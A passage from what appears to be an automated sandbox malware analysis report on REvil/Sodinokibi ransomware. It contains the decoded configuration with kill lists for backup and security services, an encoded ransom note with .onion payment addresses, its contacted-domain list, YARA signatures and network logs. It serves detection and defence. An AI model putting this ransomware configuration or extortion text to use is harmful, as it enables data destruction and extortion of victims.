ZgAgAGEAbABsACAAdwBlACAAaABhAHYAZQAgAHUAcABsAG8AYQBkAGUAZAAgAG0AbwByAGUAIAB0AGgAZQBuACAAOAAwACAARwBCACAAYQByAGMAaABpAHYAZQBkACAAZABhAHQAYQAgAGYAcgBvAG0AIABcAFwAVQBEAEEAVABBAC4ADQAKAA0ACgBFAHgAYQBtAHAAbABlACAAbwBmACAAZABhAHQAYQA6AA0ACgAtACAAQQBjAGMAbwB1AG4AdABpAG4AZwANAAoALQAgAEYAaQBuAGEAbgBjAGUADQAKAC0AIABQAGUAcgBzAG8AbgBhAGwAIABEAGEAdABhAA0ACgAtACAAQgBhAG4AawBpAG4AZwAgAGQAYQB0AGEADQAKAC0AIABTAHQAcgBhAHQAZQBnAGkAYwAgAHMAbwB1AHIAYwBpAG4AZwANAAoALQAgAE0AYQBuAGEAZwBlAG0AZQBuAHQADQAKAC0AIABwAHIAbwBqAGUAYwB0AHMALAAgAHAAbABhAG4AcwANAAoALQAgAEMAbwBuAGYAaQBkAGUAbgB0AGkAYQBsACAAZgBpAGwAZQBzAA0ACgBBAG4AZAAgAG0AbwByAGUAIABvAHQAaABlAHIALgAuAC4ADQAKAA0ACgBPAHUAcgAgAGIAbABvAGcAOgANAAoAaAB0AHQAcAA6AC8ALwBkAG4AcABzAGMAbgBiAGEAaQB4ADYAbgBrAHcAdgB5AHMAdABsADMAeQB4AGcAbAB6ADcAbgB0AGUAaQBjAHEAcgBvAHUAMwB0ADcANQB0AHAAYwBjADUANQAzADIAYwB6AHQAYwA0ADYAcQB5AGQALgBvAG4AaQBvAG4ALwANAAoAUgBlAGEAZAAgAHcAaABhAHQAIABoAGEAcABwAGUAbgBzACAAdABvACAAdABoAG8AcwBlACAAdwBoAG8AIABkAG8AIABuAG8AdAAgAHAAYQB5AC4ADQAKAA0ACgBXAGUAIABhAHIAZQAgAHIAZQBhAGQAeQA6AA0ACgAtACAAVABvACAAcAByAG8AdgBpAGQAZQAgAHkAbwB1ACAAdABoAGUAIABlAHYAaQBkAGUAbgBjAGUAIABvAGYAIABzAHQAbwBsAGUAbgAgAGQAYQB0AGEADQAKAC0AIABUAG8AIABnAGkAdgBlACAAeQBvAHUAIAB1AG4AaQB2AGUAcgBzAGEAbAAgAGQAZQBjAHIAeQBwAHQAaQBuAGcAIAB0AG8AbwBsACAAZgBvAHIAIABhAGwAbAAgAGUAbgBjAHIAeQBwAHQAZQBkACAAZgBpAGwAZQBzAC4ADQAKAC0AIABUAG8AIABkAGUAbABlAHQAZQAgAGEAbABsACAAdABoAGUAIABzAHQAbwBsAGUAbgAgAGQAYQB0AGEALgANAAoAWwArAF0AIABXAGgAYQB0ACAAZwB1AGEAcgBhAG4AdABlAGUAcwA/ACAAWwArAF0ADQAKAA0ACgBJAHQAcwAgAGoAdQBzAHQAIABhACAAYgB1AHMAaQBuAGUAcwBzAC4AIABXAGUAIABhAGIAcwBvAGwAdQB0AGUAbAB5ACAAZABvACAAbgBvAHQAIABjAGEAcgBlACAAYQBiAG8AdQB0ACAAeQBvAHUAIABhAG4AZAAgAHkAbwB1AHIAIABkAGUAYQBsAHMALAAgAGUAeABjAGUAcAB0ACAAZwBlAHQAdABpAG4AZwAgAGIAZQBuAGUAZgBpAHQAcwAuACAASQBmACAAdwBlACAAZABvACAAbgBvAHQAIABkAG8AIABvAHUAcgAgAHcAbwByAGsAIABhAG4AZAAgAGwAaQBhAGIAaQBsAGkAdABpAGUAcwAgAC0AIABuAG8AYgBvAGQAeQAgAHcAaQBsAGwAIABuAG8AdAAgAGMAbwBvAHAAZQByAGEAdABlACAAdwBpAHQAaAAgAHUAcwAuACAASQB0AHMAIABuAG8AdAAgAGkAbgAgAG8AdQByACAAaQBuAHQAZQByAGUAcwB0AHMALgANAAoAVABvACAAYwBoAGUAYwBrACAAdABoAGUAIABhAGIAaQBsAGkAdAB5ACAAbwBmACAAcgBlAHQAdQByAG4AaQBuAGcAIABmAGkAbABlAHMALAAgAFkAbwB1ACAAcwBoAG8AdQBsAGQAIABnAG8AIAB0AG8AIABvAHUAcgAgAHcAZQBiAHMAaQB0AGUALgAgAFQAaABlAHIAZQAgAHkAbwB1ACAAYwBhAG4AIABkAGUAYwByAHkAcAB0ACAAbwBuAGUAIABmAGkAbABlACAAZgBvAHIAIABmAHIAZQBlAC4AIABUAGgAYQB0ACAAaQBzACAAbwB1AHIAIABnAHUAYQByAGEAbgB0AGUAZQAuAA0ACgBJAGYAIAB5AG8AdQAgAHcAaQBsAGwAIABuAG8AdAAgAGMAbwBvAHAAZQByAGEAdABlACAAdwBpAHQAaAAgAG8AdQByACAAcwBlAHIAdgBpAGMAZQAgAC0AIABmAG8AcgAgAHUAcwAsACAAaQB0AHMAIABkAG8AZQBzACAAbgBvAHQAIABtAGEAdAB0AGUAcgAuACAAQgB1AHQAIAB5AG8AdQAgAHcAaQBsAGwAIABsAG8AcwBlACAAeQBvAHUAcgAgAHQAaQBtAGUAIABhAG4AZAAgAGQAYQB0AGEALAAgAGMAYQB1AHMAZQAgAGoAdQBzAHQAIAB3AGUAIABoAGEAdgBlACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkALgAgAEkAbgAgAHAAcgBhAGMAdABpAHMAZQAgAC0AIAB0AGkAbQBlACAAaQBzACAAbQB1AGMAaAAgAG0AbwByAGUAIAB2AGEAbAB1AGEAYgBsAGUAIAB0AGgAYQBuACAAbQBvAG4AZQB5AC4ADQAKAA0ACgBbACsAXQAgAEgAbwB3ACAAdABvACAAZwBlAHQAIABhAGMAYwBlAHMAcwAgAG8AbgAgAHcAZQBiAHMAaQB0AGUAPwAgAFsAKwBdAA0ACgANAAoAWQBvAHUAIABoAGEAdgBlACAAdAB3AG8AIAB3AGEAeQBzADoADQAKAA0ACgAxACkAIABbAFIAZQBjAG8AbQBtAGUAbgBkAGUAZABdACAAVQBzAGkAbgBnACAAYQAgAFQATwBSACAAYgByAG8AdwBzAGUAcgAhAA0ACgBhACkAIABEAG8AdwBuAGwAbwBhAGQAIABhAG4AZAAgAGkAbgBzAHQAYQBsAGwAIABUAE8AUgAgAGIAcgBvAHcAcwBlAHIAIABmAHIAbwBtACAAdABoAGkAcwAgAHMAaQB0AGUAOgAgAGgAdAB0AHAAcwA6AC8ALwB0AG8AcgBwAHIAbwBqAGUAYwB0AC4AbwByAGcALwANAAoAYgApACAATwBwAGUAbgAgAG8AdQByACAAdwBlAGIAcwBpAHQAZQA6ACAAaAB0AHQAcAA6AC8ALwBhAHAAbABlAGIAegB1ADQANwB3AGcAYQB6AGEAcABkAHEAawBzADYAdgByAGMAdgA2AHoAYwBuAGoAcABwAGsAYgB4AGIAcgA2AHcAawBlAHQAZgA1ADYAbgBmADYAYQBxADIAbgBtAHkAbwB5AGQALgBvAG4AaQBvAG4ALwB7AFUASQBEAH0ADQAKAA0ACgAyACkAIABJAGYAIABUAE8AUgAgAGIAbABvAGMAawBlAGQAIABpAG4AIAB5AG8AdQByACAAYwBvAHUAbgB0AHIAeQAsACAAdAByAHkAIAB0AG8AIAB1AHMAZQAgAFYAUABOACEAIABCAHUAdAAgAHkAbwB1ACAAYwBhAG4AIAB1AHMAZQAgAG8AdQByACAAcwBlAGMAbwBuAGQAYQByAHkAIAB3AGUAYgBzAGkAdABlAC4AIABGAG8AcgAgAHQAaABpAHMAOgANAAoAYQApACAATwBwAGUAbgAgAHkAbwB1AHIAIABhAG4AeQAgAGIAcgBvAHcAcwBlAHIAIAAoAEMAaAByAG8AbQBlACwAIABGAGkAcgBlAGYAbwB4ACwAIABPAHAAZQByAGEALAAgAEkARQAsACAARQBkAGcAZQApAA0ACgBiACkAIABPAHAAZQBuACAAbwB1AHIAIABzAGUAYwBvAG4AZABhAHIAeQAgAHcAZQBiAHMAaQB0AGUAOgAgAGgAdAB0AHAAOgAvAC8AZABlAGMAbwBkAGUAcgAuAHIAZQAvAHsAVQBJAEQAfQANAAoADQAKAFcAYQByAG4AaQBuAGcAOgAgAHMAZQBjAG8AbgBkAGEAcgB5ACAAdwBlAGIAcwBpAHQAZQAgAGMAYQBuACAAYgBlACAAYgBsAG8AYwBrAGUAZAAsACAAdABoAGEAdABzACAAdwBoAHkAIABmAGkAcgBzAHQAIAB2AGEAcgBpAGEAbgB0ACAAbQB1AGMAaAAgAGIAZQB0AHQAZQByACAAYQBuAGQAIABtAG8AcgBlACAAYQB2AGEAaQBsAGEAYgBsAGUALgANAAoADQAKAFcAaABlAG4AIAB5AG8AdQAgAG8AcABlAG4AIABvAHUAcgAgAHcAZQBiAHMAaQB0AGUALAAgAHAAdQB0ACAAdABoAGUAIABmAG8AbABsAG8AdwBpAG4AZwAgAGQAYQB0AGEAIABpAG4AIAB0AGgAZQAgAGkAbgBwAHUAdAAgAGYAbwByAG0AOgANAAoASwBlAHkAOgANAAoADQAKAA0ACgB7AEsARQBZAH0ADQAKAA0ACgANAAoALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAA0ACgANAAoAIQAhACEAIABEAEEATgBHAEUAUgAgACEAIQAhAA0ACgBEAE8ATgBUACAAdAByAHkAIAB0AG8AIABjAGgAYQBuAGcAZQAgAGYAaQBsAGUAcwAgAGIAeQAgAHkAbwB1AHIAcwBlAGwAZgAsACAARABPAE4AVAAgAHUAcwBlACAAYQBuAHkAIAB0AGgAaQByAGQAIABwAGEAcgB0AHkAIABzAG8AZgB0AHcAYQByAGUAIABmAG8AcgAgAHIAZQBzAHQAbwByAGkAbgBnACAAeQBvAHUAcgAgAGQAYQB0AGEAIABvAHIAIABhAG4AdABpAHYAaQByAHUAcwAgAHMAbwBsAHUAdABpAG8AbgBzACAALQAgAGkAdABzACAAbQBhAHkAIABlAG4AdABhAGkAbAAgAGQAYQBtAGcAZQAgAG8AZgAgAHQAaABlACAAcAByAGkAdgBhAHQAZQAgAGsAZQB5ACAAYQBuAGQALAAgAGEAcwAgAHIAZQBzAHUAbAB0ACwAIABUAGgAZQAgAEwAbwBzAHMAIABhAGwAbAAgAGQAYQB0AGEALgANAAoAIQAhACEAIAAhACEAIQAgACEAIQAhAA0ACgBPAE4ARQAgAE0ATwBSAEUAIABUAEkATQBFADoAIABJAHQAcwAgAGkAbgAgAHkAbwB1AHIAIABpAG4AdABlAHIAZQBzAHQAcwAgAHQAbwAgAGcAZQB0ACAAeQBvAHUAcgAgAGYAaQBsAGUAcwAgAGIAYQBjAGsALgAgAEYAcgBvAG0AIABvAHUAcgAgAHMAaQBkAGUALAAgAHcAZQAgACgAdABoAGUAIABiAGUAcwB0ACAAcwBwAGUAYwBpAGEAbABpAHMAdABzACkAIABtAGEAawBlACAAZQB2AGUAcgB5AHQAaABpAG4AZwAgAGYAbwByACAAcgBlAHMAdABvAHIAaQBuAGcALAAgAGIAdQB0ACAAcABsAGUAYQBzAGUAIABzAGgAbwB1AGwAZAAgAG4AbwB0ACAAaQBuAHQAZQByAGYAZQByAGUALgANAAoAIQAhACEAIAAhACEAIQAgACEAIQAhAAAA", "et": 0, "wipe": true, "wfld": ["backup"], "rdmcnt": 0, "nname": "{EXT}-readme.txt", "pk": "FDtJqlbkMA5DjrKi/sH653OY4J4hBtpB+JyN0FRpo3U=", "net": true, "exp": false, "arn": false}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
tS9P6wPz9x.exeMAL_RANSOM_REvil_Oct20_1Detects REvil ransomwareFlorian Roth
  • 0x4cee:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
  • 0x9a4e:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
  • 0xa03a:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
  • 0x9273:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
  • 0x9a3d:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.204386386.0000000002DB9000.00000004.00000040.sdmpJoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security
    00000000.00000003.204547357.0000000002DB9000.00000004.00000040.sdmpJoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security
      00000000.00000000.203907016.00000000009C1000.00000020.00020000.sdmpMAL_RANSOM_REvil_Oct20_1Detects REvil ransomwareFlorian Roth
      • 0x48ee:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
      • 0x964e:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
      • 0x9c3a:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
      • 0x8e73:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
      • 0x963d:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F
      00000000.00000003.204201424.0000000002DB9000.00000004.00000040.sdmpJoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security
        00000000.00000003.204266101.0000000002DB9000.00000004.00000040.sdmpJoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security
          Click to see the 6 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.tS9P6wPz9x.exe.9c0000.1.unpackMAL_RANSOM_REvil_Oct20_1Detects REvil ransomwareFlorian Roth
          • 0x4cee:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
          • 0x9a4e:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
          • 0xa03a:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
          • 0x9273:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
          • 0x9a3d:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F
          0.0.tS9P6wPz9x.exe.9c0000.0.unpackMAL_RANSOM_REvil_Oct20_1Detects REvil ransomwareFlorian Roth
          • 0x4cee:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
          • 0x9a4e:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
          • 0xa03a:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
          • 0x9273:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
          • 0x9a3d:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: tS9P6wPz9x.exeAvira: detected
          Found malware configurationShow sources
          Source: tS9P6wPz9x.exe.2844.0.memstrMalware Configuration Extractor: Sodinokibi {"prc": ["dbsnmp", "excel", "ocssd", "outlook", "sql", "mydesktopqos", "infopath", "thunderbird", "synctime", "ocomm", "wordpad", "sqbcoreservice", "encsvc", "msaccess", "agntsvc", "mydesktopservice", "xfssvccon", "powerpnt", "isqlplussvc", "winword", "onenote", "firefox", "thebat", "dbeng50", "tbirdconfig", "visio", "mspub", "steam", "oracle", "ocautoupds"], "sub": "6815", "svc": ["mepocs", "sophos", "backup", "veeam", "sql", "svc$", "memtas", "vss"], "wht": {"ext": ["com", "386", "ldf", "cur", "deskthemepack", "spl", "ocx", "cpl", "prf", "icl", "scr", "msi", "msu", "msp", "ico", "drv", "ps1", "ics", "bat", "exe", "diagpkg", "themepack", "nomedia", "rtp", "msstyles", "msc", "hlp", "key", "adv", "dll", "theme", "lock", "diagcab", "sys", "icns", "nls", "diagcfg", "cmd", "hta", "mpa", "mod", "lnk", "bin", "idx", "cab", "rom", "wpx", "shs", "ani"], "fls": ["boot.ini", "bootfont.bin", "ntuser.dat", "desktop.ini", "bootsect.bak", "iconcache.db", "ntuser.ini", "ntldr", "thumbs.db", "ntuser.dat.log", "autorun.inf"], "fld": ["windows.old", "boot", "$recycle.bin", "program files (x86)", "mozilla", "programdata", "appdata", "google", "tor browser", "perflogs", "intel", "$windows.~bt", "msocache", "application data", "program files", "$windows.~ws", "system volume information", "windows"]}, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA", "dmn": "asgestion.com;binder-buerotechnik.at;narcert.com;dontpassthepepper.com;bbsmobler.se;baylegacy.com;trulynolen.co.uk;testcoreprohealthuk.com;summitmarketingstrategies.com;bigbaguettes.eu;aarvorg.com;wien-mitte.co.at;tulsawaterheaterinstallation.com;latribuessentielle.com;maratonaclubedeportugal.com;n1-headache.com;bxdf.info;withahmed.com;transportesycementoshidalgo.es;digivod.de;365questions.org;truenyc.co;ikads.org;theduke.de;manifestinglab.com;stacyloeb.com;mediaacademy-iraq.org;gemeentehetkompas.nl;daklesa.de;pierrehale.com;conexa4papers.trade;bargningavesta.se;humancondition.com;thewellnessmimi.com;huehnerauge-entfernen.de;12starhd.online;brandl-blumen.de;you-bysia.com.au;kmbshipping.co.uk;idemblogs.com;nsec.se;havecamerawilltravel2017.wordpress.com;delawarecorporatelaw.com;quickyfunds.com;sojamindbody.com;jasonbaileystudio.com;jameskibbie.com;modamilyon.com;mapawood.com;vesinhnha.com.vn;mrxermon.de;boompinoy.com;xn--singlebrsen-vergleich-nec.com;radaradvies.nl;international-sound-awards.com;mbxvii.com;profectis.de;helenekowalsky.com;southeasternacademyofprosthodontics.org;zieglerbrothers.de;eraorastudio.com;liveottelut.com;thedad.com;malychanieruchomoscipremium.com;tampaallen.com;amylendscrestview.com;sabel-bf.com;offroadbeasts.com;enovos.de;serce.info.pl;mindpackstudios.com;qlog.de;woodworkersolution.com;milanonotai.it;smartypractice.com;expandet.dk;tinyagency.com;westdeptfordbuyrite.com;porno-gringo.com;labobit.it;innote.fi;
          Multi AV Scanner detection for domain / URLShow sources
          Source: 365questions.orgVirustotal: Detection: 6%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: tS9P6wPz9x.exeVirustotal: Detection: 75%Perma Link
          Machine Learning detection for sampleShow sources
          Source: tS9P6wPz9x.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C5CDE CryptStringToBinaryW,CryptStringToBinaryW,0_2_009C5CDE
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C541B CryptAcquireContextW,CryptGenRandom,0_2_009C541B
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C5D3F CryptBinaryToStringW,CryptBinaryToStringW,0_2_009C5D3F

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: tS9P6wPz9x.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Creates license or readme fileShow sources
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile created: C:\4wfaj7427w-readme.txtJump to behavior
          Uses secure TLS version for HTTPS connectionsShow sources
          Source: unknownHTTPS traffic detected: 185.2.4.64:443 -> 192.168.2.3:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 87.230.41.243:443 -> 192.168.2.3:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 166.62.110.232:443 -> 192.168.2.3:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 74.220.215.94:443 -> 192.168.2.3:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.201.60.54:443 -> 192.168.2.3:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 66.155.35.240:443 -> 192.168.2.3:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.72.5.145:443 -> 192.168.2.3:49748 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.72.5.145:443 -> 192.168.2.3:49749 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.175.106.113:443 -> 192.168.2.3:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.195.240.117:443 -> 192.168.2.3:49752 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 89.46.91.28:443 -> 192.168.2.3:49753 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.168.131.241:443 -> 192.168.2.3:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 136.243.147.81:443 -> 192.168.2.3:49755 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.165.53.185:443 -> 192.168.2.3:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 85.234.145.174:443 -> 192.168.2.3:49757 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 85.234.145.174:443 -> 192.168.2.3:49758 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.137.75.185:443 -> 192.168.2.3:49759 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.107.227.241:443 -> 192.168.2.3:49760 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.78.13:443 -> 192.168.2.3:49761 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.139.128.10:443 -> 192.168.2.3:49762 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 159.69.118.212:443 -> 192.168.2.3:49763 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.98.131.150:443 -> 192.168.2.3:49764 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 83.166.155.153:443 -> 192.168.2.3:49765 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.93.110.250:443 -> 192.168.2.3:49766 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 94.16.115.81:443 -> 192.168.2.3:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 35.221.46.9:443 -> 192.168.2.3:49768 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 198.12.145.239:443 -> 192.168.2.3:49769 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 144.76.225.204:443 -> 192.168.2.3:49770 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.29.252.113:443 -> 192.168.2.3:49771 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 178.250.15.192:443 -> 192.168.2.3:49772 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 155.133.142.13:443 -> 192.168.2.3:49773 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.9.188:443 -> 192.168.2.3:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.26.13.9:443 -> 192.168.2.3:49775 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.93.110.250:443 -> 192.168.2.3:49776 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 46.30.215.215:443 -> 192.168.2.3:49777 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.222.33:443 -> 192.168.2.3:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 116.90.53.15:443 -> 192.168.2.3:49779 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 116.90.53.15:443 -> 192.168.2.3:49780 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 85.119.82.125:443 -> 192.168.2.3:49781 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 85.119.82.125:443 -> 192.168.2.3:49782 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.121.58.131:443 -> 192.168.2.3:49783 version: TLS 1.2
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: z:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: x:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: v:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: t:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: r:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: p:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: n:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: l:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: j:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: h:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: f:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: b:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: y:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: w:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: u:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: s:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: q:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: o:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: m:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: k:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: i:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: g:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: e:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: c:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: a:Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C761A FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose,0_2_009C761A
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\NULLJump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\manifest.jsonJump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\_platform_specificJump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\_platform_specific\win_x64Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\_platform_specific\NULLJump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\LICENSEJump to behavior

          Networking:

          barindex
          Found Tor onion addressShow sources
          Source: tS9P6wPz9x.exe, 00000000.00000003.204300775.0000000002DF5000.00000004.00000040.sdmpString found in binary or memory: http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/
          Source: tS9P6wPz9x.exe, 00000000.00000003.204300775.0000000002DF5000.00000004.00000040.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
          Source: tS9P6wPz9x.exe, 00000000.00000003.364421083.0000000002DF0000.00000004.00000040.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/05EE5FC73EB66605
          Source: 4wfaj7427w-readme.txt.0.drString found in binary or memory: http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/
          Source: 4wfaj7427w-readme.txt.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/05EE5FC73EB66605
          Source: unknownNetwork traffic detected: DNS query count 46
          Source: unknownNetwork traffic detected: IP country count 13
          Source: Joe Sandbox ViewIP Address: 136.243.147.81 136.243.147.81
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: SIMPLYTRANSITGB SIMPLYTRANSITGB
          Source: Joe Sandbox ViewASN Name: REGISTER_UK-ASGB REGISTER_UK-ASGB
          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
          Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: <li><a href="https://www.youtube.com/user/youbysia" target="_blank"><i class="fab fa-youtube"></i></a></li> equals www.youtube.com (Youtube)
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: <li><a href="https://www.facebook.com/YouBySia" target="_blank"><i class="fab fa-facebook-f"></i></a></li> equals www.facebook.com (Facebook)
